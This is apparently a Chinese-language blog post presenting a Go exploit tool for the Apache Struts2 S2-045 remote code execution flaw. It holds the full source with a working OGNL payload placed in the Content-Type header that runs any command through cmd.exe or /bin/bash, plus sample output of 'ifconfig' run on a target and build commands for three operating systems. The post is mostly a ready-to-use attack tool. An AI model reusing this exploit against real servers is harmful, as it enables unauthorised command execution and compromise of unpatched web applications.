0x001 Team

s2-045-exp

Struts2 远程执行漏洞利用程序

使用golang实现的一个小工具
使用方法:

1
2
3
4
5
6
7
8
9
10
11
12
system@mac:~/golang/src/s2-045$ ./main http://xxx.com/1.jsp ifconfig
200
map[Server:[Apache-Coyote/1.1] Date:[Tue, 21 Mar 2017 06:08:39 GMT]]
eth0 Link encap:Ethernet HWaddr 52:54:E4:D1:15:00
inet addr:192.168.1.8 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::5054:e4ff:fed1:1500/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:9999952 errors:0 dropped:0 overruns:0 frame:0
TX packets:6667457 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:6575210434 (6.1 GiB) TX bytes:939669875 (896.1 MiB)

源代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
package main
import (
"bytes"
"flag"
"fmt"
"log"
"mime/multipart"
"net/http"
)
/* 给body添加类似上传文件的mime/multipart内容 */
func newMultipartRequest(url string, params map[string]string) (*http.Request, error) {
body := &bytes.Buffer{}
writer := multipart.NewWriter(body)
for key, val := range params {
_ = writer.WriteField(key, val)
}
writer.Close()
return http.NewRequest("POST", url, body)
}
func main() {
flag.Parse()
url := flag.Arg(0)
cmd := flag.Arg(1)
payload := "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)" +
":((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensym" +
"phony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())" +
".(#context.setMemberAccess(#dm)))).(#cmd='" + cmd + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().c" +
"ontains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds))." +
"(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOut" +
"putStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
extraParams := map[string]string{
"Test": "",
}
request, err := newMultipartRequest(url, extraParams)
if err != nil {
log.Fatal(err)
}
request.Header.Set("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36")
request.Header.Set("Content-Type", payload)
client := &http.Client{}
resp, err := client.Do(request)
if err != nil {
log.Fatal(err)
} else {
/* 读取response返回数据 */
body := &bytes.Buffer{}
_, err := body.ReadFrom(resp.Body)
if err != nil {
log.Fatal(err)
}
resp.Body.Close()
fmt.Println(resp.StatusCode)
fmt.Println(resp.Header)
fmt.Println(body)
}
}

交叉编译Linux

1
$ GOOS=linux GOARCH=amd64 go build -ldflags "-s -w" main.go

交叉编译Windows

1
$ GOOS=windows GOARCH=amd64 go build -ldflags "-s -w" main.go

交叉编译Mac OSX

1
$ GOOS=darwin GOARCH=amd64 go build -ldflags "-s -w" main.go